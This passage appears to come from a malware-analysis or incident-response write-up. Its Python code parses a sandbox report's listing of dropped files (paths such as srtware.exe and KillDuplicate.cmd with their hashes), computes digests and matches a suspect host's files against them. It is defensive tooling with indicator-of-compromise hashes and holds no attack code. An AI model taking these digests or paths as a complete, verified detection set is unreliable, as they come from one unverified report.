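    arrive before any path (a record cut off at a page boundary) go under a
    placeholder path so no digest is silently dropped.
    """
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m:
            if current is None:
                current = DroppedFile(path="<path not in this section>")
                records.append(current)
            alg, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[alg]:
                raise ValueError(f"{alg} for {current.path} has {len(digest)} hex digits")
            current.hashes[alg] = digest
        elif line.startswith("|"):
            raise ValueError(f"unrecognised table row: {line}")
        else:
            current = DroppedFile(path=line)
            records.append(current)
    return records


def hashes_of(data: bytes) -> dict:
    """Compute the same four digests the report prints, as lower-case hex."""
    return {
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
        "SHA512": hashlib.sha512(data).hexdigest(),
    }


def match_hashes(records: list, sample: dict) -> list:
    """Paths of every record sharing at least one digest with `sample`.

    Matching on any algorithm lets a lone MD5 from an older ticket still hit
    the listing; tighten to SHA256-only if collisions are a concern.
    """
    return [
        rec.path
        for rec in records
        if any(rec.hashes.get(alg) == sample.get(alg) for alg in HASH_LEN)
    ]


# Two entries copied verbatim from the listing above.
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
| MD5 | e364a1bd0e0be70100779ff5389a78da |
| SHA1 | dd8269db6032720dbac028931e28a6588fca7bae |
| SHA256 | 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e |
| SHA512 | ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338 |
C:\Users\Admin\AppData\Local\Temp\main\KillDuplicate.cmd
| MD5 | 68cecdf24aa2fd011ece466f00ef8450 |
| SHA1 | 2f859046187e0d5286d0566fac590b1836f6e1b7 |
| SHA256 | 64929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770 |
| SHA512 | 471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c |
"""

if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for r in recs:
        print(r.path, "complete" if r.is_complete() else "INCOMPLETE")
    # Constructed bytes stand in for a file pulled from a suspect host.
    print(match_hashes(recs, hashes_of(b"not the real dropper")))
```

To use it against a real host, read the whole dropped-files section of the report into `parse_listing`, then feed `hashes_of(open(path, "rb").read())` for each candidate file into `match_hashes`; a hit on a Firefox profile path is expected noise from the browser itself, while a hit on anything under `Temp\a\` or `Temp\main\` is the dropper set.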